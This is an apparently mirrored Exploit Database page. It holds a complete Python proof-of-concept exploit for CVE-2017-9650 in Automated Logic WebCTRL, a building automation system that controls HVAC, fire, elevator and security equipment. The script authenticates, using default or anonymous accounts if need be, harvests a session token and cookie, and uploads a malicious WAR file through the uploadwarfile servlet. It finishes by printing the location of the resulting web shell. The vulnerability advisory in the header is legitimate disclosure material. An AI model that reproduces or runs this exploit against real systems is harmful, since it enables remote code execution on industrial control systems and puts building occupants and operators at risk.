Automated Logic WebCTRL 6.5 – Unrestricted File Upload / Remote Code Execution

• Exploit Database
• 112 阅读

• 作者： LiquidWorm
  日期： 2017-08-22
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/42544/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233

  #!/usr/bin/env python # -*- coding: utf8 -*- # # # Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution # # # Vendor: Automated Logic Corporation # Product web page: http://www.automatedlogic.com # Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior # ALC WebCTRL, SiteScan Web 6.1 and prior # ALC WebCTRL, i-Vu 6.0 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior # ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior # # Summary: WebCTRL®, Automated Logic&apos;s web-based building automation # system, is known for its intuitive user interface and powerful integration # capabilities. It allows building operators to optimize and manage # all of their building systems - including HVAC, lighting, fire, elevators, # and security - all within a single HVAC controls platform. It&apos;s everything # they need to keep occupants comfortable, manage energy conservation measures, # identify key operational problems, and validate the results. # # Desc: WebCTRL suffers from an authenticated arbitrary code execution # vulnerability. The issue is caused due to the improper verification # when uploading Add-on (.addons or .war) files using the uploadwarfile # servlet. This can be exploited to execute arbitrary code by uploading # a malicious web archive file that will run automatically and can be # accessed from within the webroot directory. Additionaly, an improper # authorization access control occurs when using the &apos;anonymous&apos; user. # By specification, the anonymous user should not have permissions or # authorization to upload or install add-ons. In this case, when using # the anonymous user, an attacker is still able to upload a malicious # file via insecure direct object reference and execute arbitrary code. # The anonymous user was removed from version 6.5 of WebCTRL. # # Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601) #Apache-Coyote/1.1 #Apache Tomcat/7.0.42 #CJServer/1.1 #Java/1.7.0_25-b17 #Java HotSpot Server VM 23.25-b01 #Ant 1.7.0 #Axis 1.4 #Trove 2.0.2 #Xalan Java 2.4.1 #Xerces-J 2.6.1 # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # @zeroscience # # # Advisory ID: ZSL-2017-5431 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php # # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01 # CVE ID: CVE-2017-9650 # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650 # # # 30.01.2017 # #   import itertools import mimetools import mimetypes import cookielib import binascii import urllib2 import urllib import sys import re import os   from urllib2 import URLError global bindata   __author__ = &apos;lqwrm&apos;   piton = os.path.basename(sys.argv[0])   def bannerche(): print &apos;&apos;&apos; @-------------------------------------------------@ | | |WebCTRL 6.5 Authenticated RCE PoC| | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@ &apos;&apos;&apos; if len(sys.argv) < 3: print &apos;[+] Usage: &apos;+piton+&apos; <IP> <WAR FILE>&apos; print &apos;[+] Example: &apos;+piton+&apos; 10.0.0.17 webshell.war\n&apos; sys.exit()   bannerche()   host = sys.argv[1] filename = sys.argv[2]   with open(filename, &apos;rb&apos;) as f: content = f.read() hexo = binascii.hexlify(content) bindata = binascii.unhexlify(hexo)   cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener)   print &apos;[+] Probing target http://&apos;+host   try: checkhost = opener.open(&apos;http://&apos;+host+&apos;/index.jsp?operatorlocale=en&apos;) except urllib2.HTTPError, errorzio: if errorzio.code == 404: print &apos;[!] Error 001:&apos; print &apos;[-] Check your target!&apos; print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print &apos;[!] Error 002:&apos; print &apos;[-] Check your target!&apos; print sys.exit()   print &apos;[+] Target seems OK.&apos; print &apos;[+] Login please:&apos;   print &apos;&apos;&apos; Default username: Administrator, Anonymous Default password: (blank), (blank) &apos;&apos;&apos;   username = raw_input(&apos;[*] Enter username: &apos;) password = raw_input(&apos;[*] Enter password: &apos;)   login_data = urllib.urlencode({&apos;pass&apos;:password, &apos;name&apos;:username, &apos;touchscr&apos;:&apos;false&apos;})   opener.addheaders = [(&apos;User-agent&apos;, &apos;Thrizilla/33.9&apos;)] login = opener.open(&apos;http://&apos;+host+&apos;/?language=en&apos;, login_data) auth = login.read()   if re.search(r&apos;productName = \&apos;WebCTRL&apos;, auth): print &apos;[+] Authenticated!&apos; token = re.search(&apos;wbs=(.+?)&&apos;, auth).group(1) print &apos;[+] Got wbs token: &apos;+token cookie1, cookie2 = [str(c) for c in cj] cookie = cookie1[8:51] print &apos;[+] Got cookie: &apos;+cookie else: print &apos;[-] Incorrect username or password.&apos; print sys.exit()   print &apos;[+] Sending payload.&apos;   class MultiPartForm(object):   def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return   def get_content_type(self): return &apos;multipart/form-data; boundary=%s&apos; % self.boundary   def add_field(self, name, value): self.form_fields.append((name, value)) return   def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or &apos;application/octet-stream&apos; self.files.append((fieldname, filename, mimetype, body)) return   def __str__(self):   parts = [] part_boundary = &apos;--&apos; + self.boundary   parts.extend( [ part_boundary, &apos;Content-Disposition: form-data; name="%s"&apos; % name, &apos;&apos;, value, ] for name, value in self.form_fields )   parts.extend( [ part_boundary, &apos;Content-Disposition: file; name="%s"; filename="%s"&apos; % \ (field_name, filename), &apos;Content-Type: %s&apos; % content_type, &apos;&apos;, body, ] for field_name, filename, content_type, body in self.files )   flattened = list(itertools.chain(*parts)) flattened.append(&apos;--&apos; + self.boundary + &apos;--&apos;) flattened.append(&apos;&apos;) return &apos;\r\n&apos;.join(flattened)   if __name__ == &apos;__main__&apos;: form = MultiPartForm() form.add_field(&apos;wbs&apos;, token) form.add_field(&apos;file"; filename="&apos;+filename, bindata) request = urllib2.Request(&apos;http://&apos;+host+&apos;/_common/servlet/lvl5/uploadwarfile&apos;) request.add_header(&apos;User-agent&apos;, &apos;SCADA/8.0&apos;) body = str(form) request.add_header(&apos;Content-type&apos;, form.get_content_type()) request.add_header(&apos;Cookie&apos;, cookie) request.add_header(&apos;Content-length&apos;, len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read()   print &apos;[+] Payload uploaded.&apos; print &apos;[+] Shell available at: http://&apos;+host+&apos;/&apos;+filename[:-4] print   sys.exit()